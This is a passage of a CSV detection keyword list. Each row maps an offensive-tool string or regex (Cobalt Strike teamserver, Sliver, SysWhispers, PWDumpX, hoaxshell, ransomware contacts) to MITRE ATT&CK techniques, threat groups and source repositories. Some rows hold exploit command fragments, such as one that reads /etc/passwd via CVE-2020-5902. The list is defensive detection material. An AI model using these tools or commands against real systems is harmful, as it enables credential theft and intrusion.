"*systemctl enable teamserver.service*",".{0,1000}systemctl\senable\steamserver\.service.{0,1000}","offensive_tool_keyword","cobaltstrike","teamserver cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","60791"
"*systemctl start IMDS*",".{0,1000}systemctl\sstart\sIMDS.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","60794"
"*systemctl start nessusd*",".{0,1000}systemctl\sstart\snessusd.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","0","#linux","N/A","9","10","N/A","N/A","N/A","N/A","60795"
"*systemctl start sliver*",".{0,1000}systemctl\sstart\ssliver.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","60798"
"*systemctl start teamserver.service*",".{0,1000}systemctl\sstart\steamserver\.service.{0,1000}","offensive_tool_keyword","cobaltstrike","teamserver cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","60800"
"*systemctl start tor*",".{0,1000}systemctl\sstart\stor.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway","T1090 - T1095 - T1573","TA0005","N/A","N/A","Defense Evasion","https://github.com/GouveaHeitor/nipe","1","0","N/A","N/A","9","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","60801"
"*systemctl status IMDS*",".{0,1000}systemctl\sstatus\sIMDS.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","60802"
"*systemctl status teamserver.service*",".{0,1000}systemctl\sstatus\steamserver\.service.{0,1000}","offensive_tool_keyword","cobaltstrike","teamserver cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","60805"
"*systemctl stop IMDS*",".{0,1000}systemctl\sstop\sIMDS.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","60809"
"*SysWhispers.git *",".{0,1000}SysWhispers\.git\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/InlineWhispers","1","0","N/A","N/A","10","10","315","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z","60815"
"*syswhispers.py*",".{0,1000}syswhispers\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","N/A","10","10","315","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z","60816"
"*syswhispers.py*",".{0,1000}syswhispers\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","N/A","10","10","185","28","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z","60817"
"*syswhispers.py*",".{0,1000}syswhispers\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","60818"
"*syswhispers.py*",".{0,1000}syswhispers\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","60819"
"*syswhispers.py*",".{0,1000}syswhispers\.py.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1059 - T1573 - T1218 - T1216","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","N/A","10","1414","180","2024-07-31T05:24:06Z","2022-03-07T18:56:21Z","60820"
"*SysWhispers2*",".{0,1000}SysWhispers2.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","N/A","10","10","185","28","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z","60821"
"*syswhispers-apc.c*",".{0,1000}syswhispers\-apc\.c.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","N/A","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","60822"
"*syswhispers-apc.h*",".{0,1000}syswhispers\-apc\.h.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","N/A","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","60823"
"*syswhispers-apc-asm.x64.asm*",".{0,1000}syswhispers\-apc\-asm\.x64\.asm.{0,1000}","offensive_tool_keyword","ChaiLdr","Indirect syscalls AV bypass","T1055.011 - T1569 - T1564 - T1213","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Cipher7/ChaiLdr","1","0","N/A","N/A","9","3","220","35","2024-05-17T13:58:04Z","2024-03-29T09:19:10Z","60824"
"*syswhispersv2_x86*",".{0,1000}syswhispersv2_x86.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","60825"
"*szRemotePWDumpEXEPath*",".{0,1000}szRemotePWDumpEXEPath.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","60826"
"*szymon1118/logon_backdoor*",".{0,1000}szymon1118\/logon_backdoor.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","1","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","60828"
"*-t * -x lfr -f /etc/passwd*",".{0,1000}\-t\s.{0,1000}\s\-x\slfr\s\-f\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/dunderhay/CVE-2020-5902","1","0","#linux","N/A","N/A","1","37","8","2024-03-19T01:21:06Z","2020-07-06T04:03:58Z","60829"
"*-t * -x rce -a list+auth+user+admin*",".{0,1000}\-t\s.{0,1000}\s\-x\srce\s\-a\slist\+auth\+user\+admin.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/dunderhay/CVE-2020-5902","1","0","N/A","N/A","N/A","1","37","8","2024-03-19T01:21:06Z","2020-07-06T04:03:58Z","60830"
"*t.me/dedsecransom*",".{0,1000}t\.me\/dedsecransom.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","1","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","60831"
"*t.me/Melteddd*",".{0,1000}t\.me\/Melteddd.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","1","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","60832"
"*t.me/RipperSec\x20\x20\x20\x20\x20\x20\x1b*",".{0,1000}t\.me\/RipperSec\\x20\\x20\\x20\\x20\\x20\\x20\\x1b.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","0","#content","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","60833"
"*-t: force use of Impersonation Privilege*",".{0,1000}\-t\:\sforce\suse\sof\sImpersonation\sPrivilege.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#content","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","60834"
"*T0XlCv1.rule*",".{0,1000}T0XlCv1\.rule.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","60835"
"*T1esh0u/SecScanC2*",".{0,1000}T1esh0u\/SecScanC2.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","#P2P","N/A","10","","N/A","","","","60836"
"*t3l3machus/ACEshark*",".{0,1000}t3l3machus\/ACEshark.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/t3l3machus/ACEshark","1","1","N/A","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","60837"
"*t3l3machus/BabelStrike*",".{0,1000}t3l3machus\/BabelStrike.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","N/A","1","2","132","23","2024-07-19T07:02:42Z","2023-01-10T07:59:00Z","60838"
"*t3l3machus/hoaxshell*",".{0,1000}t3l3machus\/hoaxshell.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","60839"
"*t3l3machus/Synergy-httpx*",".{0,1000}t3l3machus\/Synergy\-httpx.{0,1000}","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","N/A","8","2","129","17","2024-07-19T06:40:59Z","2023-06-02T10:06:41Z","60840"
"*TailorScan.exe *",".{0,1000}TailorScan\.exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","60846"
"*TailorScan_darwin*",".{0,1000}TailorScan_darwin.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","1","#linux","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","60847"
